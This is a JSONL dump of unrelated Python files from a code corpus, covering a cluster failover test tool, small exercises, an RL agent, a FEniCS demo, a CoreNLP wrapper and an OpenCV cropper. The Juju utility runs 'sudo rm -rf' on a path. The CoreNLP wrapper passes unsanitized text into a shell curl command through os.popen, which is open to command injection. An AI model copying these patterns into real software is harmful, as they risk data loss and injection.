add_help=False)\n\n parser.add_argument('-e', '--env-check', dest='env_check', action='store_true',\n help='Check environment')\n parser.add_argument('-c', '--cluster-check', dest='cluster_check', action='store_true',\n help='Check cluster state')\n\n group_mutual = parser.add_mutually_exclusive_group()\n group_mutual.add_argument('--kill-sbd', dest='sbd', action='store_true',\n help='kill sbd daemon')\n group_mutual.add_argument('--kill-corosync', dest='corosync', action='store_true',\n help='kill corosync daemon')\n group_mutual.add_argument('--kill-pacemakerd', dest='pacemakerd', action='store_true',\n help='kill pacemakerd daemon')\n group_mutual.add_argument('--fence-node', dest='fence_node', metavar='NODE',\n help='Fence specific node')\n parser.add_argument('-l', '--kill-loop', dest='loop', action='store_true',\n help='kill process in loop')\n\n other_options = parser.add_argument_group('other options')\n other_options.add_argument('-d', '--debug', dest='debug', action='store_true',\n help='Print verbose debugging information')\n other_options.add_argument('-y', '--yes', dest='yes', action='store_true',\n help='Answer \"yes\" if asked to run the test')\n '''\n other_options.add_argument('-u', dest='user', metavar='USER',\n help='User for login')\n other_options.add_argument('-p', dest='password', metavar='PASSWORD',\n help='Password for login')\n '''\n other_options.add_argument('-h', '--help', dest='help', action='store_true',\n help='show this help message and exit')\n\n args = parser.parse_args()\n if args.help:\n parser.print_help()\n sys.exit(0)\n for arg in vars(args):\n setattr(context, arg, getattr(args, arg))\n\n\ndef run(context):\n parse_argument(context)\n\n try:\n check.check(context)\n kill_testcase(context)\n fence_node(context)\n\n except KeyboardInterrupt:\n print(\"\\nCtrl-C, leaving\")\n sys.exit(1)\n\n\nctx = Context()\n","sub_path":"cluster_test_tool/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159263355","text":"'''\nProblem : Minimum number of Appends needed to make a string palindrome\n\n'''\n\n# Checking if the String is palindrome or not\n\n\ndef isPalindrome(Str):\n Len = len(Str)\n\n # single character is always palindrome\n if (Len == 1):\n return True\n\n # pointing to first character\n ptr1 = 0\n # pointing to last character\n ptr2 = Len - 1\n\n while (ptr2 > ptr1):\n if (Str[ptr1] != Str[ptr2]):\n return False\n ptr1 += 1\n ptr2 -= 1\n return True\n\n# Recursive function to count number of appends\n\n\ndef noOfAppends(s):\n if (isPalindrome(s)):\n return 0\n\n # Removing first character of String by\n # incrementing base address pointer.\n del s[0]\n return 1 + noOfAppends(s)\n\n\nif __name__ == \"__main__\":\n se = \"abede\"\n s = [i for i in se]\n print(noOfAppends(s))\n","sub_path":"alok-tripathi-workplace/set2/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"434768974","text":"\"\"\"\nejercicio 15\nUn grupo de amigos se hospedan en un hotel, y al momento de pagar se dividen los gastos\nde la siguiente manera:\na. Iván paga el 40 %\nb. German paga el 33 %\nc. Esteban paga el 55 % de lo que pago Iván\nd. Hernán paga el resto\n\"\"\"\ntotal_a_pagar = float(input(\"el total a pagar en pesos es: \"))\nivan_paga = total_a_pagar * 0.4\ngerman_paga = total_a_pagar * 0.33\nesteban_paga = ivan_paga * 0.55\nHernan_paga = total_a_pagar - esteban_paga - german_paga - ivan_paga\n\nprint(\"Ivan paga \", ivan_paga, \"German paga \", german_paga, \"Esteban paga\", esteban_paga, 'Hernan paga', Hernan_paga)","sub_path":"Trabajo Práctico 1/TP1_E15.py","file_name":"TP1_E15.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"458116958","text":"# coding=utf-8\n# Copyright 2021 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"C51 agent with fixed replay buffer(s).\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nfrom batch_rl.fixed_replay.replay_memory import fixed_replay_buffer\nfrom dopamine.agents.rainbow import rainbow_agent\nimport gin\nimport tensorflow.compat.v1 as tf\n\n\n@gin.configurable\nclass FixedReplayRainbowAgent(rainbow_agent.RainbowAgent):\n \"\"\"An implementation of the DQN agent with fixed replay buffer(s).\"\"\"\n\n def __init__(self, sess, num_actions, replay_data_dir, replay_suffix=None,\n init_checkpoint_dir=None, **kwargs):\n \"\"\"Initializes the agent and constructs the components of its graph.\n\n Args:\n sess: tf.Session, for executing ops.\n num_actions: int, number of actions the agent can take at any state.\n replay_data_dir: str, log Directory from which to load the replay buffer.\n replay_suffix: int, If not None, then only load the replay buffer\n corresponding to the specific suffix in data directory.\n init_checkpoint_dir: str, directory from which initial checkpoint before\n training is loaded if there doesn't exist any checkpoint in the current\n agent directory. If None, no initial checkpoint is loaded.\n **kwargs: Arbitrary keyword arguments.\n \"\"\"\n assert replay_data_dir is not None\n tf.logging.info(\n 'Creating FixedReplayAgent with replay directory: %s', replay_data_dir)\n tf.logging.info('\\t init_checkpoint_dir %s', init_checkpoint_dir)\n tf.logging.info('\\t replay_suffix %s', replay_suffix)\n # Set replay_log_dir before calling parent's initializer\n self._replay_data_dir = replay_data_dir\n self._replay_suffix = replay_suffix\n if init_checkpoint_dir is not None:\n self._init_checkpoint_dir = os.path.join(\n init_checkpoint_dir, 'checkpoints')\n else:\n self._init_checkpoint_dir = None\n\n super(FixedReplayRainbowAgent, self).__init__(sess, num_actions, **kwargs)\n\n def step(self, reward, observation):\n \"\"\"Records the most recent transition and returns the agent's next action.\n\n Args:\n reward: float, the reward received from the agent's most recent action.\n observation: numpy array, the most recent observation.\n\n Returns:\n int, the selected action.\n \"\"\"\n self._record_observation(observation)\n self.action = self._select_action()\n return self.action\n\n def end_episode(self, reward):\n assert self.eval_mode, 'Eval mode is not set to be True.'\n super(FixedReplayRainbowAgent, self).end_episode(reward)\n\n def _build_replay_buffer(self, use_staging):\n \"\"\"Creates the replay buffer used by the agent.\"\"\"\n\n return fixed_replay_buffer.WrappedFixedReplayBuffer(\n data_dir=self._replay_data_dir,\n replay_suffix=self._replay_suffix,\n observation_shape=self.observation_shape,\n stack_size=self.stack_size,\n use_staging=use_staging,\n update_horizon=self.update_horizon,\n gamma=self.gamma,\n observation_dtype=self.observation_dtype.as_numpy_dtype)\n","sub_path":"batch_rl/fixed_replay/agents/rainbow_agent.py","file_name":"rainbow_agent.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"267648300","text":"import collections\n\nclass Solution:\n def pyramidTransition(self, bottom: str, allowed) -> bool:\n table = collections.defaultdict(set)\n\n for s in allowed:\n pre = s[:2]\n table[pre].add(s[2:])\n return self.helper(bottom, [], table, 1)\n\n def helper(self, cur, nxt, table, i):\n if len(cur) == 1:\n return True\n\n if len(nxt) + 1 == len(cur):\n return self.helper(nxt, [], table, 1)\n\n node = \"\".join(cur[i - 1:i + 1])\n for ch in table[node]:\n if self.helper(cur, nxt + [ch], table, i + 1):\n return True\n return False\n\n\n\n\n","sub_path":"LeetcodeNew/python/LC_756.py","file_name":"LC_756.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"311142043","text":"from __future__ import print_function\n\nfrom contextlib import contextmanager\nimport errno\nimport logging\nimport os\nfrom shutil import (\n copytree,\n rmtree,\n)\nimport subprocess\nfrom time import time\nfrom tempfile import mkdtemp\nimport uuid\nimport yaml\n\n\n@contextmanager\ndef temp_dir(parent=None):\n directory = mkdtemp(dir=parent, prefix='cwr_tst_')\n try:\n yield directory\n finally:\n try:\n rmtree(directory)\n except OSError:\n run_command('sudo rm -rf {}'.format(directory))\n\n\ndef configure_logging(log_level):\n logging.basicConfig(\n level=log_level, format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n\ndef ensure_dir(path, parent=None):\n path = os.path.join(parent, path) if parent else path\n try:\n os.mkdir(path)\n return path\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n\ndef run_command(command, verbose=True):\n \"\"\"Execute a command and maybe print the output.\"\"\"\n if isinstance(command, str):\n command = command.split()\n if verbose:\n logging.info('Executing: {}'.format(command))\n proc = subprocess.Popen(command, stdout=subprocess.PIPE)\n output = ''\n while proc.poll() is None:\n try:\n for status in proc.stdout:\n logging.info(status.rstrip())\n output += status\n except IOError:\n # SIGTERM/SIGINT generates io error\n pass\n if proc.returncode != 0 and proc.returncode is not None:\n output, error = proc.communicate()\n logging.info(\"ERROR: run_command failed: {}\".format(error))\n e = subprocess.CalledProcessError(proc.returncode, command, error)\n e.stderr = error\n raise e\n return output\n\n\ndef get_juju_home():\n home = os.environ.get('JUJU_HOME')\n if home is None:\n home = os.path.join(os.environ.get('HOME'), 'cloud-city')\n return home\n\n\ndef copytree_force(src, dst, ignore=None):\n if os.path.exists(dst):\n rmtree(dst)\n copytree(src, dst, ignore=ignore)\n\n\ndef generate_controller_names(controllers):\n names = []\n prefix = 'cwr-'\n for name in controllers:\n if name.startswith('cwr-'):\n names.append(name)\n else:\n names.append('{}{}'.format(prefix, name))\n return names\n\n\ndef rename_env(from_env, to_env, env_path):\n with open(env_path, 'r') as f:\n env = yaml.load(f)\n new_env = to_env + from_env\n env['environments'][new_env] = env['environments'].pop(from_env)\n with open(env_path, 'w') as f:\n yaml.dump(env, f, indent=4, default_flow_style=False)\n return new_env\n\n\ndef juju_run(command, args='', e=''):\n e = '-e {}'.format(e) if e else e\n return run_command('juju {} {} {}'.format(command, e, args))\n\n\ndef juju_status(e=''):\n return juju_run('status', e=e)\n\n\ndef generate_test_id():\n return uuid.uuid4().hex\n\n\ndef cloud_from_env(env):\n env = env.lower()\n if 'aws' in env:\n if 'china' in env:\n return 'aws-china'\n return 'aws/sa-east-1'\n if 'azure' in env:\n return 'azure/northeurope'\n if 'gce' in env or 'google' in env:\n return 'google/europe-west1'\n if 'joyent' in env:\n return 'joyent/us-sw-1'\n if 'power8' in env or 'borbein-maas' in env:\n return 'borbein-maas'\n if 'ob-maas' in env or 'maas-ob' in env:\n return 'ob-maas'\n if 'prodstack' in env:\n return 'prodstack45'\n return None\n\n\ndef get_temp_controller_name(controller_name):\n suffix = os.environ.get('BUILD_NUMBER') or str(time()).split('.')[0]\n return \"{}-{}\".format(controller_name, suffix)\n","sub_path":"buildcloud/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"575643410","text":"from PyQt5.QtWidgets import QApplication, QMainWindow\nfrom login import login_inter, valida_login\nfrom servicos import servicos\nimport sys\n\n#classe principal\nclass Main(QMainWindow, login_inter.Ui_MainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n super().setupUi(self)\n\n self.btnlogin.clicked.connect(self.logar)\n self.btnsair.clicked.connect(self.saindo)\n\n def logar(self):\n em = self.inputemail.text()\n sh = self.inputsenha.text()\n self.user = valida_login.Login(em, sh)\n self.proxjan = servicos.Servicos(self.user)\n self.proxjan.show()\n self.hide()\n\n @staticmethod\n def saindo():\n sys.exit()\n\n\nif __name__ == '__main__':\n qt= QApplication(sys.argv)\n ma = Main()\n ma.show()\n qt.exec_()\n","sub_path":"Archer Adm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"125715205","text":"#--- Exercicio 1 - Input, Estrutura de decisão e operações matemáticas\n#--- Crie um programa que leia dois números inteiros\n#--- Realize as 4 operações matemáticas básicas com os números lidos\n#--- Imprima os resultados das operações \n#--- Informe qual número é maior ou se os dois são iguais\n\nx = int(input('Informe o primeiro número\\n'))\ny = int(input('Informe o segundo número\\n'))\n\nsoma = x + y\nsub = x - y\nmulti = x * y\ndiv = x / y\n\nprint(f'Adição: {soma}\\nSubtração: {sub}\\nMultiplicação: {multi}\\nDivisão: {div}')\n\nif(x > y):\n print(f'O primeiro número ({x}) é maior que o segundo número ({y})')\nelif(y > x):\n print(f'O segundo número ({y}) é maior que o primeiro número ({x})')\nelif(x == y):\n print('Os dois números são iguais')","sub_path":"exercicios/exercicio1.py","file_name":"exercicio1.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"649154850","text":"\n\nclass Settings(object):\n\n def __init__(self):\n self.width = 1024\n self.height = 800\n self.bg_color = (220,220,220)\n self.speed = 1.5\n self.bullet_speed = 5\n self.bullet_width = 3\n self.bullet_height = 5\n self.bullet_color = (60,60,60)\n\n self.monster_speed = 2\n self.max_monster_count = 3\n\n\n\nbullet_speed = 5\nbullet_width = 3\nbullet_height = 5\nbullet_color = (60,60,60)\n\n\nmonster_speed = 2\nmax_monster_count = 3","sub_path":"src/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"18668823","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 18 13:54:37 2018\n\n@author: arpitansh\n\"\"\"\n\n'''\nThe Fibonacci Sequence is computed based on the following formula:\n\n\nf(n)=0 if n=0\nf(n)=1 if n=1\nf(n)=f(n-1)+f(n-2) if n>1\n\nPlease write a program using list comprehension to print the Fibonacci Sequence \nin comma separated form with a given n input by console.\n\nExample:\nIf the following n is given as input to the program:\n\n7\n\nThen, the output of the program should be:\n\n0,1,1,2,3,5,8,13\n'''\n\ndef fibo(n):\n if n==0:\n return 0\n elif n==1:\n return 1\n else:\n return fibo(n-2)+fibo(n-1)\n \nn = int(input('Enter value of n: '))\nvalue = [str(fibo(x)) for x in range (0,n+1)]\nprint(','.join(value))\n \n","sub_path":"q61.py","file_name":"q61.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47278454","text":"# video 182. Screen Setup and Creating a Snake Body\n\nfrom turtle import Screen, Turtle\nimport time\n\nscreen = Screen()\nscreen.setup(width = 600, height = 600)\nscreen.bgcolor(\"black\")\nscreen.title(\"Welcome to my Snake Game\")\n\n# set tracer == 0, wait for we drawing the while picture\nscreen.tracer(0)\n\nstart_positions = [(0, 0), (-20, 0), (-40, 0)]\n\nsegments = []\n\nfor position in start_positions:\n new_segment = Turtle(shape = \"square\")\n new_segment.color(\"white\")\n new_segment.penup()\n new_segment.goto(position)\n segments.append(new_segment)\n\nscreen.update()\n\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n \n # moving strategy\n # let n cube move to n-1 position\n # and let the first cube follow the key instruction/original setting\n for seg_num in range(len(segments)-1, 0, -1):\n new_x, new_y = segments[seg_num - 1].xcor(), segments[seg_num - 1].ycor()\n segments[seg_num].goto(new_x, new_y)\n \n segments[0].forward(20)\n # segments[0].backward(20)\n \n \n\n\nscreen.exitonclick()","sub_path":"Day020/v182.py","file_name":"v182.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"314196474","text":"\"\"\" This demo program solves a hyperelastic problem. It is implemented\nin Python by Johan Hake following the C++ demo by Harish Narayanan\"\"\"\n\n# Copyright (C) 2008-2010 Johan Hake and Garth N. Wells\n#\n# This file is part of DOLFIN.\n#\n# DOLFIN is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# DOLFIN is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with DOLFIN. If not, see .\n#\n# Modified by Harish Narayanan 2009\n# Modified by Anders Logg 2011\n#\n# First added: 2009-10-11\n# Last changed: 2012-11-12\n\n# Begin demo\n\nfrom dolfin import *\nimport numpy as np\n\n# Optimization options for the form compiler\nparameters[\"form_compiler\"][\"cpp_optimize\"] = True\nffc_options = {\"optimize\": True}#, \\\n# \"precompute_ip_const\": True}\n# \"eliminate_zeros\": True, \\\n# \"precompute_basis_const\": True, \\\n\n# Create mesh and define function space\nmesh = UnitCubeMesh(8, 8, 8)\n#mesh = UnitCubeMesh(24, 16, 16)\n\nV_space = VectorFunctionSpace(mesh, \"Lagrange\", 1)\n\n# Define functions\n#du = TrialFunction(V) # Incremental displacement\n#v = TestFunction(V) # Test function\n#u = Function(V) # Displacement from previous iteration\n\n# Test whether solution can be loaded into mixed function space.\nV_element = VectorElement(\"CG\", mesh.ufl_cell() , 1)\nmixed_element = FunctionSpace(mesh, MixedElement([V_element, V_element]))\n\nV = TestFunction(mixed_element)\ndU = TrialFunction(mixed_element)\nU = Function(mixed_element)\nU0 = Function(mixed_element)\n\nxi, eta = split(V)\nu, v = split(U)\n\n#u0, v0 = U0.split(deepcopy = True)\nu0 = Function(V_space)\n_u0 = np.loadtxt('twisty_downloaded.txt', dtype = float)\n_u0 = np.loadtxt('twisty.txt', dtype = float)\n\nu0.vector()[:] = _u0[:]\n#_u02 = np.concatenate((_u0 ,0.0*_u0),axis = 0)\n\n#U.vector()[:] = _u02\n#u, v1 = U.split(deepcopy = True)\n\n# Load initial conditions to u0 and v0. Otherwise set to 0.\n#u0 = Constant((0,)*V_space.mesh().geometry().dim())\nv0 = Constant((0,)*V_space.mesh().geometry().dim())\n\n# Functions for solver\nxi, eta = split(V) \t# Test functions\nu, v = split(U)\t\t# Functions\n\ncells = CellFunction(\"size_t\", mesh)\ndx = Measure('dx', domain = mesh, subdomain_data = cells)\n\n# Project u0 and v0 into U0\na_proj = inner(dU, V)*dx\nL_proj = inner(u0, xi)*dx + inner(v0, eta)*dx\nsolve(a_proj == L_proj, U0)\n\nu0, v0 = U0.split(deepcopy = True)\n\n# Mark boundary subdomians\nleft = CompiledSubDomain(\"near(x[0], side) && on_boundary\", side = 0.0)\nright = CompiledSubDomain(\"near(x[0], side) && on_boundary\", side = 1.0)\n\n# Define Dirichlet boundary (x = 0 or x = 1)\nc = Expression((\"0.0\", \"0.0\", \"0.0\"), degree=2)\nr = Expression((\"scale*0.0\",\n \"scale*(y0 + (x[1] - y0)*cos(theta) - (x[2] - z0)*sin(theta) - x[1])\",\n \"scale*(z0 + (x[1] - y0)*sin(theta) + (x[2] - z0)*cos(theta) - x[2])\"),\n scale = 0.5, y0 = 0.5, z0 = 0.5, theta = pi/3, degree=2)\n#r = Expression((\"0.0\", \"0.0\", \"0.0\"), degree=2)\n\n#clamp = Constant((0.0, 0.0, 0.0))\n#bcl = DirichletBC(V, clamp, left)\n\n#bcl = DirichletBC(V, c, left)\n#bcr = DirichletBC(V, r, right)\n\n#bcs = [bcl, bcr]\n#bcs = [bcl]\n\n\n\n\nB = Constant((0.0, -0.5, 0.0)) # Body force per unit volume\n#B = Constant((0.0, 0.0, 0.0)) # Body force per unit volume\n#T = Constant((0.1, 0.1, 0.1)) # Traction force on the boundary\nT = Constant((0.1, 0.0, 0.0)) # Traction force on the boundary\n\n# Kinematics\nd = u.geometric_dimension()\nI = Identity(d) # Identity tensor\nF = I + grad(u) # Deformation gradient\nC = F.T*F # Right Cauchy-Green tensor\n\nE = (C - I)/2\nE = variable(E)\n\n# Invariants of deformation tensors\nIc = tr(C)\nJ = det(F)\n\n# Elasticity parameters\n#E, nu = 10.0, 0.3\n#mu, lmbda = Constant(E/(2*(1 + nu))), Constant(E*nu/((1 + nu)*(1 - 2*nu)))\n\nmu = Constant(3.85)\nlmbda = Constant(5.77)\n\n# Stored strain energy density (compressible neo-Hookean model)\n#psi = (mu/2)*(Ic - 3) - mu*ln(J) + (lmbda/2)*(ln(J))**2\n\n# (st venant model)\npsi = lmbda/2*(tr(E)**2)+mu*tr(E*E)\n\n# Total potential energy\nPi = psi*dx - dot(B, u)*dx - dot(T, u)*ds\n\n# Compute first variation of Pi (directional derivative about u in the direction of v)\nF = derivative(Pi, u, v)\n\n# Compute Jacobian of F\nJ = derivative(F, u, du)\n\n# Solve variational problem\n#solve(F == 0, u, bcs, J=J,\n# form_compiler_parameters=ffc_options)\n\n# Save solution in VTK format\nfile = File(\"results/displacement.pvd\");\n\nU.assign(U0)\nu, v = U.split()\nfile << u;\n\n# save displacement field\n#u_txt = u.vector().array()\n#u_txt = u.vector().get_local()\n\n#np.savetxt('twisty.txt', u_txt)\n\n# Plot and hold solution\n#plot(u, mode = \"displacement\", interactive = True)\n","sub_path":"4_Structure_test/demo_hyperelasticity/demo_hyperelasticity.py","file_name":"demo_hyperelasticity.py","file_ext":"py","file_size_in_byte":5141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"342667771","text":"import concurrent.futures\n\nimport pytest\n\nfrom rhoknp import KNP, Document, Jumanpp, RegexSenter, Sentence\n\nis_knp_available = KNP().is_available()\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\ndef test_call() -> None:\n knp = KNP()\n text = \"外国人参政権\"\n assert isinstance(knp(text), Document)\n assert isinstance(knp(Document.from_raw_text(text)), Document)\n assert isinstance(knp(Sentence.from_raw_text(text)), Sentence)\n with pytest.raises(TypeError):\n knp(1) # type: ignore\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\ndef test_apply() -> None:\n knp = KNP()\n text = \"外国人参政権\"\n assert isinstance(knp.apply(text), Document)\n assert isinstance(knp.apply(Document.from_raw_text(text)), Document)\n assert isinstance(knp.apply(Sentence.from_raw_text(text)), Sentence)\n with pytest.raises(TypeError):\n knp.apply(1) # type: ignore\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\n@pytest.mark.parametrize(\n \"text\",\n [\n \"外国人参政権\",\n \"望遠鏡で泳いでいる少女を見た。\",\n \"エネルギーを素敵にENEOS\", # EOS\n \"Canon EOS 80D買った\", # EOS\n '\"最高\"の気分', # double quotes\n \"<tag>エス'ケープ\", # escape\n \"\\\\エス'ケープ\", # backslash\n \"キャリッジ\\rリターン\", # carriage return\n \"ライン\\nフィード\", # line feed\n \"CR\\r\\nLF\", # CR+LF\n ],\n)\ndef test_apply_to_sentence(text: str) -> None:\n knp = KNP()\n sent = knp.apply_to_sentence(text)\n assert sent.text == text.replace(\"\\r\", \"\").replace(\"\\n\", \"\")\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\ndef test_thread_safe() -> None:\n knp = KNP()\n texts = [\"外国人参政権\", \"望遠鏡で泳いでいる少女を見た。\", \"エネルギーを素敵にENEOS\"]\n texts *= 10\n with concurrent.futures.ThreadPoolExecutor() as executor:\n futures = [executor.submit(knp.apply_to_sentence, text) for text in texts]\n for i, future in enumerate(futures):\n sentence = future.result()\n assert sentence.text == texts[i]\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\n@pytest.mark.parametrize(\n \"text\",\n [\n \"外国人参政権\",\n \"望遠鏡で泳いでいる少女を見た。\",\n \"エネルギーを素敵にENEOS\", # EOS\n \"Canon EOS 80D買った\", # EOS\n '\"最高\"の気分', # double quotes\n \"<tag>エス'ケープ\", # escape\n \"\\\\エス'ケープ\", # backslash\n \"キャリッジ\\rリターン\", # carriage return\n \"ライン\\nフィード\", # line feed\n \"CR\\r\\nLF\", # CR+LF\n ],\n)\ndef test_apply_to_document(text: str) -> None:\n knp = KNP()\n doc = knp.apply_to_document(text)\n assert doc.text == text.replace(\"\\r\", \"\").replace(\"\\n\", \"\")\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\ndef test_get_version() -> None:\n knp = KNP()\n _ = knp.get_version()\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\ndef test_is_available() -> None:\n knp = KNP()\n assert knp.is_available() is True\n\n knp = KNP(\"knpppppppppppppppppppp\")\n assert knp.is_available() is False\n\n with pytest.raises(RuntimeError):\n _ = knp.apply_to_sentence(\"test\")\n\n with pytest.raises(RuntimeError):\n _ = knp.apply_to_document(\"test\")\n\n with pytest.raises(RuntimeError):\n _ = knp.get_version()\n\n\ndef test_invalid_option() -> None:\n with pytest.raises(ValueError):\n _ = KNP(options=[\"--anaphora\"])\n\n\ndef test_repr() -> None:\n knp = KNP(options=[\"-tab\"], senter=RegexSenter(), jumanpp=Jumanpp())\n assert (\n repr(knp)\n == \"KNP(executable='knp', options=['-tab'], senter=RegexSenter(), jumanpp=Jumanpp(executable='jumanpp'))\"\n )\n","sub_path":"tests/processors/test_knp.py","file_name":"test_knp.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"93409030","text":"import os\nimport time\nimport pprint\nimport random\nimport json\nimport sys\nfrom tqdm import tqdm\n\n\ndef read(filename):\n with open(filename,'r')as f:\n data=json.load(f)\n return data\n\n\ndef stanford_api(sen,port=9000):\n\n shell = ''' curl --data '%s' ''' %(sen)+ ''' 'http://localhost:%d'''%port+'''/?properties={%22annotators%22%3A%22tokenize%2Cssplit%2Cpos%2Copenie%22%2C%22outputFormat%22%3A%22json%22}' -o - '''\n #print(shell)\n #print(shell)\n result_str = os.popen(shell).read()\n #print(result_str)\n #print(type(result_str))\n # time.sleep(random.uniform(1.5,10.5))\n return result_str\n\ndef parse(output):\n result=[]\n data=json.loads(output)\n if \"sentences\" in data:\n data=data[\"sentences\"][0]\n if \"openie\" in data:\n result=data[\"openie\"]\n return result\n\ndef fetchT(result):\n triples=[]\n for i in result:\n triple=[i['subject'], i['relation'], i['object']]\n triples.append(triple)\n return triples\n\ndef processSen(sen):\n if '\\'' in sen:\n sen=sen.replace()\n\ndef stanfordT(sen,port):\n try:\n result_str = stanford_api(sen,port)\n result = parse(result_str)\n\n triple=fetchT(result)\n\n return triple\n except:\n return []\n\nimport nltk\nfrom nltk.tokenize import WordPunctTokenizer\ndef split2sen(paragraph):\n paragraph=str(paragraph)\n sen_tokenizer = nltk.data.load('tokenizers/punkt/english.pickle') \n sentences = sen_tokenizer.tokenize(paragraph)\n return sentences\n\ndef main():\n filename=sys.argv[1]\n if os.path.isfile(filename):\n print('start process %s.'%filename)\n else:\n return\n data=read(filename)\n newdata=[]\n for i in tqdm(data):\n newi=i\n question=i['question']\n qt=[] \n #if len(question['minie_t'])==0:\n sen=question['text']\n qt=stanfordT(sen)\n newi['question']['stanford_t']=qt\n\n context=i['context']\n newcontext=dict()\n for c in context:\n text=context[c]['text']\n if type(text)==list:\n text=' '.join(text)\n sens=split2sen(text)\n triple=[]\n for sen in sens:\n triple.extend(stanfordT(sen))\n newcontext[c]=context[c]\n newcontext[c]['stanford_t']=triple\n newi['context']=newcontext\n newdata.append(newi)\n assert len(newdata)==len(data)\n outputfile = filename.replace('.json','_stantri.json')\n print('store the data to %s.'%outputfile)\n with open(outputfile,'w')as f:\n json.dump(newdata,f,indent=4)\n\n\n\n \n \n\nif __name__ ==\"__main__\":\n main()\n #sen='skdj'\n #stanford_api(sen)\n","sub_path":"preprocess/standford.py","file_name":"standford.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"414990646","text":"from PIL import Image\nimport numpy as np\n\nwith open(\"./tower.jpg\",\"rb\") as file:\n img = Image.open(file)\n img = img.convert(\"RGB\")\n img = img.resize((64,64)) # RGB 값이 64*64의 List형식으로 저장되어 있다.\n data = np.asarray(img)\n '''\n img.save(\"test.png\") # 저장하기\n '''\n\n ","sub_path":"Machine_Learning_Practice/ex)avhash-search.py","file_name":"ex)avhash-search.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"627009048","text":"import cv2 \nimport numpy as np\nimport sys\n\nref_point = []\ncropping = False\n\ndef shape_selection(event, x, y, flags, param):\n # grab references to the global variables\n global ref_point, cropping\n\n # if the left mouse button was clicked, record the starting\n # (x, y) coordinates and indicate that cropping is being performed\n if event == cv2.EVENT_LBUTTONDOWN:\n ref_point = [(x, y)]\n cropping = True\n\n \n elif event == cv2.EVENT_LBUTTONUP: # check to see if the left mouse button was released\n # record the ending (x, y) coordinates and indicate that the cropping operation is finished\n ref_point.append((x, y))\n cropping = False\n\n # draw a rectangle around the region of interest\n cv2.rectangle(image, ref_point[0], ref_point[1], (0, 255, 0), 2)\n cv2.imshow(\"image\", image)\n\n# load the image, copy it, and setup the mouse callback function\nimg = sys.argv[1]\nimage = cv2.imread(img)\nclone = image.copy()\ncv2.namedWindow(\"image\", cv2.WINDOW_NORMAL)\ncv2.setMouseCallback(\"image\", shape_selection)\n\nprint(\"---Select a part of an image to detect rust---\\n\")\nprint(\"*Press r key to reset the selection\\n*Press c to cut de selected area\\n*Press q to quit\")\nprint(\"\\nIf several areas selected, only the last one will be chosen \")\n\n# keep looping until the 'q'|'c' key is pressed\nwhile True:\n # display the image and wait for a keypress\n cv2.imshow(\"image\", image)\n key = cv2.waitKey(1) & 